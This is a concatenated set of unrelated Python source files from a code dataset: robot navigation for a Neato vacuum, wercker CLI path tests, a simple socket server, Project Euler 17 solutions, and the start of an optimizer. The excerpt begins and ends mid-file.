nek_utils.write_th_bc(el_list, nR, nSq, 2, 'base2d.rea')\n nek_utils.write_th_bc(el_list, nR, nSq, 3, 'base3d.rea')\n\n## C: Do some checks and write a little output\n#----------------------------------------------------------------------\nnek_utils.dump_input_vars(R, nR, nSq, nZ, L_z, N, Re_t, stretch_sq,\\\n dr_sq_ratio, dr_sq_int_ratio, distri_on, a_interf,\\\n tog_r_out_const, tog_a_on_dist)\n\nnek_utils.check_mesh_quality(el_list, nR, nSq, nZ, R, L_z, N, Re_t)\n","sub_path":"GenPipeMesh.py","file_name":"GenPipeMesh.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"1777237","text":"import os\n\nfrom werckercli.tests import (\n DataSetTestCase,\n TempHomeSettingsCase,\n)\n\nfrom werckercli.paths import (\n find_git_root,\n get_global_wercker_path,\n WERCKER_FOLDER_NAME,\n WERCKER_CREDENTIALS_FILE,\n get_global_wercker_filename,\n check_or_create_path\n)\n\n\nclass GitFindRepoTests(DataSetTestCase):\n repo_name = 'subfolders'\n\n def test_find_git_root_in_same_folder(self):\n result = find_git_root(\n os.path.join(\n self.folder,\n self.repo_name\n ),\n self.get_git_folder()\n )\n self.assertFalse(result is None)\n\n def test_find_git_root_from_subfolder(self):\n # self.assertTrue(False)\n new_folder = os.path.join(\n self.folder,\n self.repo_name,\n # self.get_git_folder(),\n \"multiple\",\n \"subfolders\",\n \"and\",\n \"it\",\n \"still\"\n )\n\n result = find_git_root(new_folder, self.get_git_folder())\n\n self.assertFalse(result is None)\n\n def test_find_git_root_from_curdir(self):\n # print os\n # print os.getcwd()\n # current_dir = os.getcwd()\n\n os.chdir(self.get_home_folder())\n os.mkdir('.git')\n result = find_git_root(os.curdir)\n\n self.assertTrue(result)\n\n # os.chdir(current_dir)\n\n def test_no_matching_parent(self):\n result = find_git_root(\n self.get_home_folder(),\n folder_name=\"this_folder_must_not_exist.\"\n )\n\n self.assertFalse(result)\n\n\nclass WerckerSettingsPathTests(TempHomeSettingsCase):\n\n def test_get_global_wercker_path(self):\n\n result = get_global_wercker_path()\n\n self.assertFalse(result is None)\n self.assertTrue(result.startswith(self.get_home_folder()))\n self.assertTrue(result.endswith(WERCKER_FOLDER_NAME))\n\n\nclass WerckerGlobalFilenameTests(TempHomeSettingsCase):\n\n def test_get_global_filename(self):\n\n result = get_global_wercker_filename()\n\n self.assertTrue(result.endswith(WERCKER_CREDENTIALS_FILE))\n\n\nclass WerckerGetOrCreateTests(TempHomeSettingsCase):\n\n def test_create(self):\n\n result = check_or_create_path(\n os.path.join(\n self.get_home_folder(),\n 'test-folder'\n )\n )\n\n self.assertTrue(result)\n\n def test_create_multiple_levels(self):\n\n result = check_or_create_path(\n os.path.join(\n self.get_home_folder(),\n 'test-folder',\n 'subfolder'\n )\n )\n\n self.assertTrue(result)\n","sub_path":"werckercli/tests/test_paths.py","file_name":"test_paths.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"514956669","text":"from test_NeatoCommands import envia\nfrom neatoOdometry import NeatoOdometry\nfrom Laser_code import NeatoLaser\nfrom multiprocessing import Process, Queue\nimport threading\nimport time\nimport math\nimport http_viewer\n\nclass NeatoRobot:\n north = 0\n distance = 540\n speed = 120\n direction = 0 #0 fordward, 1 backward\n theta = 0\n tiempo = 20\n S = 121.5\n\n def __init__(self, ser):\n self.ser = ser\n envia(self.ser, 'TestMode On', 0.2)\n envia(self.ser, 'PlaySound 1', 0.2)\n envia(self.ser, \"SetMotor LWheelEnable RWheelEnable\", 0.2)\n envia(self.ser, 'SetLDSRotation On', 2)\n self.laser = NeatoLaser(ser)\n \n self.exit = False\n \n self.pose_queue = Queue()\n self.laser_queue = Queue()\n \n self.viewer = http_viewer.HttpViewer(8002, self.laser_queue, self.pose_queue)\n \n L_read, R_read = self.__get_motors()\n self.odometry = NeatoOdometry(L_read, R_read)\n \n self.thread_odometry = threading.Thread(target=self.__odometry_queue)\n self.thread_odometry.start()\n \n def __odometry_queue(self):\n while not self.exit:\n current_odometry = self.odometry.getTheoricPose()\n self.pose_queue.put([(current_odometry[0][0], current_odometry[1][0])])\n time.sleep(0.5)\n \n def __send_lasercoords(self, lasercoords):\n current_odometry = self.odometry.getTheoricPose()\n coords_real = []\n for i in range(len(lasercoords)):\n coords_real.append(self.__val_to_coord(lasercoords[i], i, current_odometry))\n self.laser_queue.put(coords_real)\n \n def Goto(self, x, y):\n print(\"Going to point\")\n L, R, angle, d = self.odometry.getGoToPoint(x, y)\n \n while (L+R) > 0:\n comando = 'SetMotor LWheelDist ' + str(L) + ' RWheelDist ' + str(R) + ' Speed ' + str(self.speed)\n self.enviaR(comando, 0.1)\n L_read, R_read = self.__get_motors()\n self.odometry.updateOdometry(L_read, R_read)\n L, R, angle, d = self.odometry.getGoToPoint(x, y)\n \n comando = 'SetMotor LWheelDist 0 RWheelDist 0 Speed 0'\n self.enviaR(comando, 0.1)\n \n def GotoObstacles(self, x, y):\n print(\"Going to point without crashing\")\n L, R, angle, d = self.odometry.getGoToPoint(x, y)\n \n while ((L+R) > 0):\n if not self.__esquiva():\n comando = 'SetMotor LWheelDist ' + str(L) + ' RWheelDist ' + str(R) + ' Speed ' + str(self.speed)\n self.enviaR(comando, 0.1)\n\n L_read, R_read = self.__get_motors()\n self.odometry.updateOdometry(L_read, R_read)\n L, R, angle, d = self.odometry.getGoToPoint(x, y)\n \n comando = 'SetMotor LWheelDist 0 RWheelDist 0 Speed 0'\n self.enviaR(comando, 0.1) \n \n def __get_motors(self):\n msg = self.enviaR('GetMotors LeftWheel RightWheel', 0.1).split('\\n')\n \n L = int(msg[4].split(',')[1])\n R = int(msg[8].split(',')[1])\n \n return (L, R)\n \n def __esquiva(self):\n dist_28 = 350\n #print(values)\n values = self.laser.get_laser()\n self.__send_lasercoords(self.laser.get_last_laser_coords())\n if values[0] < 650:\n auxvals = [values[1] + values[2], values[8] + values[9]]\n idx = auxvals.index(max(auxvals)) #Agafar el valor maxim\n if idx == 0: #Girar a l'esquerre\n self.theta = +3.141516/4.5\n print(\"Turn left\")\n else:\n self.theta = -3.141516/4.5\n print(\"Turn right\")\n esq = True\n elif (values[1] < self.distance) or (values[9] < self.distance):\n if (values[1] < self.distance) and (values[9] < self.distance):\n if values[9] < values[1]:\n self.theta = +3.141516/8\n print(\"Turn left\")\n else:\n self.theta = -3.141516/8\n print(\"Turn right\") \n elif(values[1] < self.distance):\n self.theta = -3.141516/8\n print(\"Turn right\")\n else:\n self.theta = +3.141516/8\n esq = True\n elif (values[8] < dist_28) or (values[2] < dist_28):\n if (values[8] < dist_28) and (values[2] < dist_28):\n if values[8] < values[2]:\n self.theta = +3.141516/10\n print(\"Turn left\")\n else:\n self.theta = -3.141516/10\n print(\"Turn right\")\n elif(values[8] < dist_28):\n self.theta = +3.141516/10\n print(\"Turn left\")\n else:\n self.theta = -3.141516/10\n print(\"Turn right\")\n esq = True\n else:\n self.theta = 0\n esq = False\n print(\"Front: \", values[0], \" OuterLeft: \", values[2], \" OuterRight: \", values[8], \" CenterLeft: \", values[1], \" CenterRight: \", values[9])\n print(\"Theta: \", self.theta)\n if(esq):\n distancia_R = (((self.speed * pow(-1, self.direction) ) + (self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n distancia_L = (((self.speed * pow(-1, self.direction) ) + (-self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n comando = 'SetMotor LWheelDist ' + str(distancia_L) + ' RWheelDist ' + str(distancia_R) + ' Speed ' + str(self.speed * pow(-1, self.direction))\n #print(comando)\n self.enviaR(comando, 0.4)\n return(esq)\n \n def random_path(self):\n print(\"Starting random path without crashing\")\n while True:\n values = self.laser.get_laser()\n #print(values)\n if values[0] < 650:\n auxvals = [values[1] + values[2], values[8] + values[9]]\n idx = auxvals.index(max(auxvals)) #Agafar el valor maxim\n if idx == 0: #Girar a l'esquerre\n self.theta = +3.141516/3.5\n print(\"Turn left\")\n else:\n self.theta = -3.141516/3.5\n print(\"Turn right\")\n elif (values[1] < self.distance) or (values[9] < self.distance):\n if (values[1] < self.distance) and (values[9] < self.distance):\n if values[9] < values[1]:\n self.theta = +3.141516/6\n print(\"Turn left\")\n else:\n self.theta = -3.141516/6\n print(\"Turn right\") \n elif(values[1] < self.distance):\n self.theta = -3.141516/6\n print(\"Turn right\")\n else:\n self.theta = self.theta+3.141516/6\n elif (values[8] < self.distance) or (values[2] < self.distance):\n if (values[8] < self.distance) and (values[2] < self.distance):\n if values[8] < values[2]:\n self.theta = +3.141516/8\n print(\"Turn left\")\n else:\n self.theta = -3.141516/8\n print(\"Turn right\")\n elif(values[8] < self.distance):\n self.theta = +3.141516/8\n print(\"Turn left\")\n else:\n self.theta = -3.141516/8\n print(\"Turn right\")\n else:\n self.theta = 0\n print(\"Front: \", values[0], \" OuterLeft: \", values[2], \" OuterRight: \", values[8], \" CenterLeft: \", values[1], \" CenterRight: \", values[9])\n print(\"Theta: \", self.theta)\n distancia_R = (((self.speed * pow(-1, self.direction) ) + (self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n distancia_L = (((self.speed * pow(-1, self.direction) ) + (-self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n comando = 'SetMotor LWheelDist ' + str(distancia_L) + ' RWheelDist ' + str(distancia_R) + ' Speed ' + str(self.speed * pow(-1, self.direction))\n #print(comando)\n self.enviaR(comando, 0.1)\n\n def __followWal(self, right, angle, d):\n angle_deg = angle%(2*math.pi)\n angle_deg = (angle_deg/(2*math.pi))*360\n angle_index = 0\n if(angle_deg > 340 or angle_deg < 19):\n angle_index = 0\n else:\n angle_deg = angle_deg - 19\n angle_index = int(math.ceil(angle_deg/36.0))\n \n values = self.laser.get_laser()\n threshold = d\n print(\"Angle deg: \", angle_deg)\n print(\"Angle index: \", angle_index)\n print(\"Distance to reach: \", d)\n if (values[angle_index%10] > threshold and values[(angle_index - 1)%10] > threshold and values[(angle_index + 1)%10] > threshold):\n print(\"IM GOIN TO THEE POINT!!!!!!!!!!!!!\")\n return False\n if right:\n side1 = values[8]\n side2 = values[9]\n sign = 1\n else:\n side1 = values[2]\n side2 = values[1]\n sign = -1\n if values[0] < 600:\n self.theta = sign * 3.141516/4\n print(\"FRONT\")\n wall = True\n print(\"Following wall now\")\n else:\n wall = True\n print(\"Following wall now\")\n if (side1 > 300 or side2 > 300):\n self.theta = sign * -3.141516/12\n print(\"Turn right\")\n elif (side1 < 280 or side2 < 280):\n self.theta = sign * 3.141516/12\n print(\"Turn left\")\n else:\n self.theta = 0\n \n if(wall):\n distancia_R = (((self.speed * pow(-1, self.direction) ) + (self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n distancia_L = (((self.speed * pow(-1, self.direction) ) + (-self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n comando = 'SetMotor LWheelDist ' + str(distancia_L) + ' RWheelDist ' + str(distancia_R) + ' Speed ' + str(self.speed * pow(-1, self.direction))\n self.enviaR(comando, 0.1)\n return wall\n\n def followWal(self, right):\n self.gotoWall(right)\n print(\"Following wall now\")\n while True:\n values = self.laser.get_laser()\n if right:\n side1 = values[8]\n side2 = values[9]\n sign = 1\n else:\n side1 = values[2]\n side2 = values[1]\n sign = -1\n if values[0] < 650:\n self.theta = sign * 3.141516/4\n print(\"FRONT\")\n elif (side1 > 330 or side2 > 330):\n self.theta = sign * -3.141516/12\n print(\"Turn right\")\n elif (side1 < 300 or side2 < 300):\n self.theta = sign * 3.141516/26\n print(\"Turn left\")\n else:\n self.theta = 0\n distancia_R = (((self.speed * pow(-1, self.direction) ) + (self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n distancia_L = (((self.speed * pow(-1, self.direction) ) + (-self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n comando = 'SetMotor LWheelDist ' + str(distancia_L) + ' RWheelDist ' + str(distancia_R) + ' Speed ' + str(self.speed * pow(-1, self.direction))\n self.enviaR(comando, 0.1)\n\n def gotoWall(self, right):\n print(\"Going to wall\")\n values = self.laser.get_laser()\n while(values[0] > 750):\n print(values)\n self.theta = 0\n distancia_R = (((self.speed * pow(-1, self.direction) ) + (self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n distancia_L = (((self.speed * pow(-1, self.direction) ) + (-self.S * self.theta)) * self.tiempo) * pow(-1, self.direction)\n comando = 'SetMotor LWheelDist ' + str(distancia_L) + ' RWheelDist ' + str(distancia_R) + ' Speed ' + str(self.speed * pow(-1, self.direction))\n self.enviaR(comando, 0.1)\n values = self.laser.get_laser()\n print(\"Wall reached\")\n values = self.laser.get_laser()\n if right:\n comando = 'SetMotor LWheelDist 0 RWheelDist ' + str(int(round((math.pi/2) * self.S))) + ' Speed ' + str(self.speed * pow(-1, self.direction))\n else: \n comando = 'SetMotor LWheelDist' + str(int(round((math.pi/2) * self.S))) + ' RWheelDist 0 Speed ' + str(self.speed * pow(-1, self.direction))\n self.enviaR(comando, 2)\n\n def exitMaze(self, x, y):\n print(\"Escaping Maze\")\n L, R, angle, d = self.odometry.getGoToPoint(x, y)\n while (L + R) > 0: \n if not self.__followWal(True, angle, d):\n comando = 'SetMotor LWheelDist ' + str(L) + ' RWheelDist ' + str(R) + ' Speed ' + str(self.speed)\n self.enviaR(comando, 0.1)\n L_read, R_read = self.__get_motors()\n self.odometry.updateOdometry(L_read, R_read)\n L, R, angle, d = self.odometry.getGoToPoint(x, y)\n \n comando = 'SetMotor LWheelDist 0 RWheelDist 0 Speed 0'\n self.enviaR(comando, 0.1) \n\n def fuig_segueix(self, fuig):\n get_angle = self.__get_angle_fuig\n if fuig:\n print(\"Fugint\")\n else:\n get_angle = self.__get_angle_persegueix\n print(\"Perseguint\")\n while True:\n closer = self.laser.get_closer_object()\n self.theta, direct = get_angle(closer)\n print(\"Closer: \", closer)\n print(\"Angle: \", self.theta)\n distancia_R = (((250 ) + (self.S * self.theta)) * self.tiempo) * pow(-1, direct)\n distancia_L = (((250 ) + (-self.S * self.theta)) * self.tiempo) * pow(-1, direct)\n print(\"RL: \", [distancia_R, distancia_L])\n comando = 'SetMotor LWheelDist ' + str(distancia_L) + ' RWheelDist ' + str(distancia_R) + ' Speed ' + str(250)\n print(\"Comando: \", comando)\n self.enviaR(comando, 0.5)\n \n def __get_angle_fuig(self, closer):\n if closer == 0 or closer == 9 or closer == 1:\n dir = 1\n else:\n dir = 0\n if closer == 0:\n return 0, dir \n elif closer < 5:\n return -math.pi + (closer * math.pi/5), dir\n elif closer > 5:\n return math.pi - (abs(closer - 8) * math.pi/5), dir\n else:\n return 0, dir\n \n def __get_angle_persegueix(self, closer):\n if closer == 5 or closer == 6 or closer == 4:\n dir = 1\n else:\n dir = 0\n if closer == 5:\n return 0, dir\n elif closer > 0 and closer < 6:\n return math.pi - (abs(closer-5) * math.pi/5), dir\n elif closer > 5:\n return -math.pi + (abs(closer-5) * math.pi/5), dir\n else:\n return 0, dir\n\n def enviaR(self, msg, t):\n buffer = envia(self.ser, msg, t)\n return buffer\n \n def stop(self):\n self.exit = True\n self.thread_odometry.join()\n comando = 'SetMotor LWheelDist 0 RWheelDist 0 Speed 0'\n self.enviaR(comando, 0.1)\n self.laser.enable_laser(False)\n self.viewer.quit()\n \n def __val_to_coord(self, val, index, odo):\n angle = ((index/360.0) * 2*math.pi) + odo[2][0]\n point = ((val * math.cos(angle)) + odo[0][0], (val * math.sin(angle)) + odo[1][0])\n return point\n","sub_path":"Laser2/neatoRobot2.py","file_name":"neatoRobot2.py","file_ext":"py","file_size_in_byte":15711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"38436589","text":"import socket \r\nimport time\r\nfrom threading import Thread\r\nfrom _socket import gaierror\r\n\r\n\r\n\r\nclass ServerSocket(object):\r\n\r\n def __init__(self):\r\n # create a socket object\r\n self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \r\n # get local machine name\r\n host = socket.gethostname() \r\n port = 9000 \r\n # bind to the port\r\n serversocket.bind((host, port)) \r\n # queue up to 5 requests\r\n serversocket.listen(5) \r\n \r\n def accept(self):\r\n clientsocket,client_addr = self.serversocket.accept() \r\n if not clientsocket:\r\n raise gaierror(\"Not able to connect\")\r\n return clientsocket\r\n \r\n \r\n def send(self, clientsocket,send_buffer):\r\n send_buffer = send_buffer + \"\\r\\n\"\r\n clientsocket.send(send_buffer)\r\n \r\n \r\n def recv(self,clientsocket):\r\n recv_buffer = clientsocket.recv() \r\n return recv_buffer \r\n \r\n \r\n def close(self):\r\n self.clientsocket.close()\r\n \r\n\r\n\r\nclass ServerThread(Thread):\r\n def __init__(self):\r\n self.serverobj = None\r\n self.clientSocket = None\r\n \r\n \r\n # Option A\r\n def minNcpuHr(self):\r\n message = \"Number of CPU required::\"\r\n self.serverobj.send(self.clientsocket,message)\r\n cpu = self.serverobj.recv(self.clientsocket)\r\n \r\n \r\n message = \"Number of Hours::\"\r\n self.serverobj.send(self.clientsocket,message)\r\n hrs = self.serverobj.recv(self.clientsocket)\r\n \r\n \r\n \r\n \r\n \r\n #Option B\r\n def maxPriceHr(self):\r\n message = \"Amount limit::\"\r\n self.serverobj.send(self.clientsocket,message)\r\n cpu = self.serverobj.recv(self.clientsocket)\r\n \r\n \r\n message = \"Number of Hours::\"\r\n self.serverobj.send(self.clientsocket,message)\r\n hrs = self.serverobj.recv(self.clientsocket)\r\n \r\n \r\n \r\n \r\n \r\n #Option C\r\n def combination(self):\r\n message = \"Number of CPU required::\"\r\n self.serverobj.send(self.clientsocket,message)\r\n cpu = self.serverobj.recv(self.clientsocket)\r\n \r\n \r\n message = \"Number of Hours::\"\r\n self.serverobj.send(self.clientsocket,message)\r\n hrs = self.serverobj.recv(self.clientsocket)\r\n \r\n message = \"Amount limit::\"\r\n self.serverobj.send(self.clientsocket,message)\r\n hrs = self.serverobj.recv(self.clientsocket)\r\n \r\n \r\n \r\n \r\n def command_interface(self,**kwargs):\r\n self.clientsocket = kwargs[\"clientsocket\"]\r\n self.serverobj = kwargs[\"serverobj\"]\r\n \r\n message = \"Hi: We provide Resource \\n\" +\\\r\n \"Please choose any option from below options \\n\"+ \\\r\n \"Press A: minimum N CPUs for H hours \\n\"+\\\r\n \"Press B:: Maximum price they are willing to pay for H hours\\n\"+\\\r\n \"Press C:: Combination of both.\\n\"\r\n \r\n self.serverobj.send(self.clientsocket,message) \r\n recv_buffer = self.serverobj.recv() \r\n \r\n if recv_buffer == \"A\":\r\n minNcpuHr()\r\n \r\n elif recv_buffer == \"B\":\r\n maxPriceHr()\r\n \r\n elif recv_buffer == \"C\":\r\n combination()\r\n \r\n else:\r\n serverobj.send(clientsocket,\"OOPS!! You did not choose right options\")\r\n serverobj.close(clientsocket)\r\n \r\n\r\nif __name__ == '__main__':\r\n server = ServerSocket()\r\n while True:\r\n clientsocket,addr = server.accept()\r\n server_thread = Thread(target=common_interface,name=\"client \"+str(addr),kwargs={'serverobj':server,\"clientsocket\":clientsocket})\r\n server_thread.start()\r\n \r\n \r\n","sub_path":"Resource mangement/src/resource_mangement_v.2/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"220102465","text":"# This program solves Eulers problem 17\r\n# problem 17: If all the numbers from 1 to 1000 inclusive were written out in words, how many letters would be used?\r\n## note: do not count spaces or hyphens, use 'and' in hundreds numbers. For example, 142 is one hundred and forty-two\r\n\r\n\r\ndef wordbuilder(useless):\r\n\t# we need to develop a way to convert a number to a word\r\n\t## first lets put together some dictionaries\r\n\r\n\t# ones place name dictionary\r\n\tones = { 0:'', 1:'one', 2:'two', 3:'three', 4:'four', 5:'five', 6:'six', 7:'seven', 8:'eight', 9:'nine' }\r\n\r\n\t# tens place name dictionary\r\n\ttens = { 0:'', 1:'ten', 2:'twenty', 3:'thirty', 4:'forty', 5:'fifty', 6:'sixty', 7:'seventy', 8:'eighty', 9:'ninety' }\r\n\r\n\t# hundreds place name dictionary (leave out spaces)\r\n\thundreds = { 0:'', 1:'onehundred', 2:'twohundred', 3:'threehundred', 4:'fourhundred', 5:'fivehundred', 6:'sixhundred', 7:'sevenhundred', 8:'eighthundred', 9:'ninehundred' }\r\n\r\n\t# this gets the basics, but what about the teens?\r\n\t# special teens definitions\r\n\tteens = { 0:'ten', 1:'eleven', 2:'twelve', 3:'thirteen', 4:'fourteen', 5:'fifteen', 6:'sixteen', 7:'seventeen', 8:'eighteen', 9:'nineteen' }\r\n\r\n\t# but how do we know when to use the teens instead of the usual system?\r\n\t## We'll simply have our code peek ahead when the tens place is a 1\r\n\r\n\t# now lets get down to the meat\r\n\tsumm = 0\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# accumulator\r\n\tfor i in range(1, 1001):\t\t\t\t\t\t\t\t\t\t\t# use 1001 because range() is not inclusive on upper limit\r\n\t\ts = str(i)\t\t\t\t\t\t\t\t\t\t\t\t\t\t# convert to a string\r\n\t\tword = ''\t\t\t\t\t\t\t\t\t\t\t\t\t\t# use this to build up word\r\n\t\tteen = False\t\t\t\t\t\t\t\t\t\t\t\t\t# a flag to check if number has teens\r\n\t\tif len(s) == 4:\t\t\t\t\t\t\t\t\t\t\t\t\t# pad it with leading zeros if nessesary\r\n\t\t\t#cool\r\n\t\t\tdo = 'nothing'\r\n\t\telif len(s) == 1:\r\n\t\t\ts = '000' + s\r\n\t\telif len(s) == 2:\r\n\t\t\ts = '00' + s\r\n\t\telif len(s) == 3:\r\n\t\t\ts = '0' + s\r\n\r\n\t\t# eval thousands place\r\n\t\tif int(s[0]) == 1:\r\n\t\t\tword = \"onethousand\"\r\n\r\n\t\t# eval hundreds place\r\n\t\tword = word + hundreds[int(s[1])]\t\t\t\t\t\t\t\t# dict lookup\r\n\r\n\t\t# need to peek ahead to see if we need to add 'and'\r\n\t\tif int(s[1]) != 0 and (int(s[2]) != 0 or int(s[3]) != 0):\t\t# if the tens or ones place is a non-zero number need the 'and'\r\n\t\t\tword = word + 'and'\r\n\r\n\t\t# eval tens place\r\n\t\tif int(s[2]) == 1:\t\t\t\t\t\t\t\t\t\t\t\t# dict lookup if possibly a teen\r\n\t\t\tword = word + teens[int(s[3])]\r\n\t\t\tteen = True\t\t\t\t\t\t\t\t\t\t\t\t\t# set teen flag\r\n\t\telse:\r\n\t\t\tword = word + tens[int(s[2])]\t\t\t\t\t\t\t\t# dict lookup\r\n\r\n\t\t# eval ones place\r\n\t\tif not teen:\r\n\t\t\tword = word + ones[int(s[3])]\t\t\t\t\t\t\t\t# dict lookup if flag not set\r\n\r\n\t\tsumm += len(word)\t\t\t\t\t\t\t\t\t\t\t\t# add length to accumulator\r\n\r\n\treturn summ\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# answer: 21124\r\n\r\n# sweet! we got what we wanted! but we could make it a little less computationaly intensive\r\n## How? well, we don't actually need to figure out the words! we can instead have the dict values be the number of letters in the word and add that directly to the accumulator\r\n## Let's rewrite the first function to do this instead!\r\ndef wordAccumulator(useless):\r\n\t# we need to develop a way to convert a number to a word\r\n\t## first lets put together some dictionaries\r\n\r\n\t# ones place name dictionary\r\n\tones = { 0:0, 1:3, 2:3, 3:5, 4:4, 5:4, 6:3, 7:5, 8:5, 9:4 }\r\n\r\n\t# tens place name dictionary\r\n\ttens = { 0:0, 1:3, 2:6, 3:6, 4:5, 5:5, 6:5, 7:7, 8:6, 9:6 }\r\n\r\n\t# hundreds place name dictionary (leave out spaces)\r\n\thundreds = { 0:0, 1:10, 2:10, 3:12, 4:11, 5:11, 6:10, 7:12, 8:12, 9:11 }\r\n\r\n\t# this gets the basics, but what about the teens?\r\n\t# special teens definitions\r\n\tteens = { 0:3, 1:6, 2:6, 3:8, 4:8, 5:7, 6:7, 7:9, 8:8, 9:8 }\r\n\r\n\t# but how do we know when to use the teens instead of the usual system?\r\n\t## We'll simply have our code peek ahead when the tens place is a 1\r\n\r\n\t# now lets get down to the meat\r\n\tsumm = 0\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# accumulator\r\n\tfor i in range(1, 1001):\t\t\t\t\t\t\t\t\t\t\t# use 1001 because range() is not inclusive on upper limit\r\n\t\ts = str(i)\t\t\t\t\t\t\t\t\t\t\t\t\t\t# convert to a string\r\n\t\tteen = False\t\t\t\t\t\t\t\t\t\t\t\t\t# a flag to check if number has teens\r\n\t\tif len(s) == 4:\t\t\t\t\t\t\t\t\t\t\t\t\t# pad it with leading zeros if nessesary\r\n\t\t\t#cool\r\n\t\t\tdo = 'nothing'\r\n\t\telif len(s) == 1:\r\n\t\t\ts = '000' + s\r\n\t\telif len(s) == 2:\r\n\t\t\ts = '00' + s\r\n\t\telif len(s) == 3:\r\n\t\t\ts = '0' + s\r\n\r\n\t\t# eval thousands place\r\n\t\tif int(s[0]) == 1:\r\n\t\t\tsumm += 11\r\n\r\n\t\t# eval hundreds place\r\n\t\tsumm += hundreds[int(s[1])]\t\t\t\t\t\t\t\t# dict lookup\r\n\r\n\t\t# need to peek ahead to see if we need to add 'and'\r\n\t\tif int(s[1]) != 0 and (int(s[2]) != 0 or int(s[3]) != 0):\t\t# if the tens or ones place is a non-zero number need the 'and'\r\n\t\t\tsumm += 3\r\n\r\n\t\t# eval tens place\r\n\t\tif int(s[2]) == 1:\t\t\t\t\t\t\t\t\t\t\t\t# dict lookup if possibly a teen\r\n\t\t\tsumm += teens[int(s[3])]\r\n\t\t\tteen = True\t\t\t\t\t\t\t\t\t\t\t\t\t# set teen flag\r\n\t\telse:\r\n\t\t\tsumm += tens[int(s[2])]\t\t\t\t\t\t\t\t# dict lookup\r\n\r\n\t\t# eval ones place\r\n\t\tif not teen:\r\n\t\t\tsumm += ones[int(s[3])]\t\t\t\t\t\t\t\t# dict lookup if flag not set\r\n\r\n\treturn summ\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# answer: 21124\r\n\r\n\r\n# lets compare the answers...\r\n#wordbuilder()\r\n#wordAccumulator()\r\n\r\n# they're the same! so now let's see if the new program is any faster\r\n## first let's build a timing function\r\ndef timeTest(funcs, args, runs):\t\t\t\t\t\t\t\t# takes a list with functions, any arguments as a list, and the number of runs to test over\r\n\timport time\r\n\r\n\texTimes = [0] * len(funcs)\r\n\r\n\tfor i in range(runs):\r\n\t\tfor j in range(len(funcs)):\r\n\t\t\tfor k in range(runs):\r\n\t\t\t\tstart = time.time()\r\n\t\t\t\tfuncs[j](args)\r\n\t\t\t\texTimes[j] += time.time() - start\r\n\r\n\tfor i in range(len(exTimes)):\r\n\t\texTimes[i] = exTimes[i] / (runs * runs)\r\n\treturn exTimes\r\n\r\n# next let's build a way to easily show the times\r\ndef displayTimes(funcs, args, runs, timeTester):\r\n\ttimeList = timeTester(funcs, args, runs)\r\n\tfor i in range(len(timeList)):\r\n\t\tif i == 0:\r\n\t\t\tprint(\"Function 1:\", timeList[i], \"s\")\r\n\t\telse:\r\n\t\t\tprint(\"Function \", i + 1, \": \", timeList[i], \" s; \", ((timeList[0] / timeList[i]) * 100) - 100, \" % change from \", 1, sep=\"\")\r\n\r\n# now to run the test\r\n#displayTimes([wordbuilder, wordAccumulator], 0, 10, timeTest)\r\n","sub_path":"Euler Problems/Euler17.py","file_name":"Euler17.py","file_ext":"py","file_size_in_byte":6065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"186793406","text":"import scipy.optimize\n\n# import numpy as np\nimport autograd.numpy as np # Thinly-wrapped numpy\nfrom autograd import grad\n\nimport tensorflow as tf\nfrom baselines import logger\nimport baselines.common.tf_util as U\n\nclass EtaOmegaOptimizer(object):\n \"\"\"\n Finds eta and omega Lagrange multipliers.\n \"\"\"\n\n def __init__(self, beta, epsilon, init_eta, init_omega):\n self.init_eta_omega(beta, epsilon, init_eta, init_omega)\n\n def optimize(self, w_theta, Waa, Wsa, wa, varphis, Kt, prec, is_valid_eta_omega, old_entropy, eta=None):\n\n # wa = w_beta * \\grad_beta \\varphi_beta(s) * K^T * Prec\n\n if False:\n f_dual = self.opt_info['f_dual']\n f_dual_grad = self.opt_info['f_dual_grad']\n\n # Set BFGS eval function\n def eval_dual(input):\n param_eta = input[0]\n param_omega = input[1]\n val = f_dual(*([varphis, Kt, prec, Waa, Wsa, wa] + [param_eta, param_omega, old_entropy]))\n return val.astype(np.float64)\n\n # Set BFGS gradient eval function\n def eval_dual_grad(input):\n param_eta = input[0]\n param_omega = input[1]\n grad = f_dual_grad(*([varphis, Kt, prec, Waa, Wsa, wa] + [param_eta, param_omega, old_entropy]))\n return np.asarray(grad)\n\n if eta is not None:\n param_eta = eta\n else:\n param_eta = self.param_eta\n\n if self.beta == 1000000:\n beta = 0\n else:\n beta = old_entropy - self.beta\n\n # eta_before = param_eta\n # omega_before = self.param_omega\n # dual_before = eval_dual([eta_before, omega_before])\n # dual_grad_before = eval_dual_grad([eta_before, omega_before])\n\n x0 = [param_eta, self.param_omega]\n\n # TEST\n # small = 0.000000001\n # f1 = [self.param_eta - small, self.param_omega]\n # f2 = [self.param_eta + small, self.param_omega]\n # fd = (eval_dual(f1) - eval_dual(f2)) / (2 * small)\n #\n # duals = self.opt_info[\"f_duals\"](*([varphis, Kt, prec, Waa, Wsa, wa] + [eta_before, omega_before, old_entropy]))\n # logger.log(\"Theano eta/omega: \" + str(eta_before) + \"/\" + str(omega_before) + \": \" + str(dual_before) +\n # \", \" + str(duals) + \", grad: \" + str(eval_dual_grad(x0)) + \", fd: \" + str(fd))\n # # END TEST\n\n # Create dual function\n def eval_dual(input):\n param_eta = 